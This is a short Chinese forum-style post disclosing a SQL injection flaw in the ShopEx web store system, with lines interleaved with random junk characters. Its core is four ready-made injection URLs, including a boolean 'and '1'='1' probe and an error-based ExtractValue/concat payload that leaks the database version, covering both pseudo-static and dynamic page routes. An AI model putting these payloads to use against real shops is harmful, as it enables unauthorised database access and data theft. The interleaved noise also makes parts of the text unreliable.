注入漏洞是一种经典的漏洞类型了,自从上次跟基友深聊了注入,我对注入的认识又提升了一个高度,在我看来不可以注入的地方,TMD的竟然可以注入,注入攻击最早出现了1998年,貌似是,记不清了。10多年了,依然存在,虽然比以前出现量少了,但不得不用到的一种攻击技术… + `7 U: I' f1 Z, S& E% @% h# N/ }3 a
7 H' T( O/ M, K7 a* b2 E& ]好吧,我扯远了~~
# P0 `" `% @5 ]1 g- i+ o其实注入不仅仅出现在动态页面上,难道伪静态后就不能注入了吗?NO~) q" m: G( \+ |" I
不扯了,直接说主题吧,shopex网店系统注入漏洞。注入点如下: $ y) e& [; z' s/ F2 r3 C
9 q! N# W, T# y8 D8 c1 @4 V: g
http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html 3 Q; ?& q3 [5 W1 T" D
$ ^" T$ n" j4 v9 ~/ Q, jhttp://www.x.com/comment-8967′/**/and/**/ExtractValue(0×64,concat(0×01,(select/**/@@version)))/**/order/**/by/**/’1-ask-commentlist.html
6 v4 g' p; ]6 g: W& E F6 ^. L. ?0 C7 z) r8 e" w9 J7 U
http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html " g. F! K. n8 ^$ [" B
e* S& R- R7 A% r0 C8 qhttp://demo.x.com.cn/485/index.php?comment-190′/**/and/**/’1′=’1-ask-commentlist.html
7 W$ u/ N' G# u/ n0 _$ k, n3 t: t' l& k: _
& h+ |: {3 K+ y9 Y" {7 r
一个是网站未开启伪静态的注入,一个是网站开启伪静态后的注入,以及是否屏蔽错误回显的2X2=4种情况。
6 L' i9 c( p7 a: ~5 Q如何注入就不多说了,10多年的东西了…不会也会了… : b" @: m$ l4 V
I8 a0 {/ O4 ^ v8 z% W; k
, p9 B( X; E2 U5 y6 p
/ [0 e6 f$ @1 {
0 Z0 X( @% ^% j3 q$ Q0 N; D$ i. T |